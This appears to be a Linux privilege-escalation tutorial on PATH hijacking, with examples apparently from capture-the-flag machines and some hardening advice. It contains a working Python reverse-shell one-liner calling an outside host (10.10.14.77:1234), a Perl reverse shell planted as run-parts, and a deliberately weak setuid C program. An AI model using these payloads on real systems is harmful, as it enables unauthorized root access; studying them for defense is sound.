Path Abuse

To view the current PATH, run env | grep PATH or echo $PATH.

echo $PATH

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

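If we can modify a user's PATH, we can replace a common binary such as ls with a malicious script such as a reverse shell. The shell searches the PATH directories from left to right and runs the first match, so an entry placed in front wins over the system directories. If we add . to the PATH by issuing the command PATH=.:$PATH and then export PATH, we will be able to run binaries located in our current working directory by just typing the name of the file. For the same reason, . and any directory writable by other users should never appear in the PATH of a privileged account or service.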

~$ PATH=.:${PATH}
~$ export PATH
~$ echo $PATH

.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
~$ touch ls
~$ echo 'echo "PATH ABUSE!!"' > ls
~$ chmod +x ls
~$ ls

PATH ABUSE!!

Example 1

2019/10/08 10:56:02 CMD: UID=0    PID=2689   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

# The UID=0 process calls run-parts by bare name with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, so /usr/local/sbin is searched before /bin.

jkr@writeup:~$ which run-parts
/bin/run-parts

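# The real run-parts is in /bin, so a file named run-parts in /usr/local/sbin (apparently writable by jkr on this host) is found first. Hardening: every directory in a privileged PATH should be writable by root only, and privileged jobs should call helpers by absolute path.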
jkr@writeup:~$ cp perl-reverse-shell.pl run-parts
jkr@writeup:~$ ls
perl-reverse-shell.pl  run-parts  user.txt
jkr@writeup:~$ mv run-parts /usr/local/sbin

Ref: HTB - Write-Up

Example 2

# file weak_c.c

#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
 
/*
 * Deliberately weak example: sets the real UID to the effective UID and then
 * runs `ls` through system().
 *
 * Why it is weak: system() passes the string to the shell, and "ls" has no
 * directory component, so the shell resolves it through the PATH inherited
 * from whoever starts this program. If the binary runs with elevated
 * privileges (presumably it is installed setuid -- not shown here, confirm),
 * the first file named "ls" in the caller's PATH runs with those privileges.
 *
 * Hardening: call the helper by absolute path and do not inherit the caller's
 * environment (for example execve() with an absolute path and a fixed envp
 * instead of system()). system(3) itself advises against using it in
 * set-user-ID or set-group-ID programs.
 */
int main(void)
{
    /* Make the real UID equal to the current effective UID. Presumably done
       because some shells drop privileges when the two differ -- confirm.
       The return value is not checked, so a failed call goes unnoticed. */
    setreuid(geteuid(), geteuid());
    /* Bare command name: looked up through PATH, which the caller controls. */
    system("ls /path/to/secret/.file");
    return 0;
}
$ which cat
/bin/cat
cp /bin/cat /tmp/ls
$ export PATH=/tmp/:$PATH
$ ./weak_c

Example 3

theseus@ubuntu:/tmp/poc$ nano fdisk
theseus@ubuntu:/tmp/poc$ cat fdisk
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
theseus@ubuntu:/tmp/poc$ chmod 777 fdisk
theseus@ubuntu:/tmp/poc$ export PATH=/tmp/poc:$PATH
theseus@ubuntu:/tmp/poc$ /bin/sysinfo

Resources
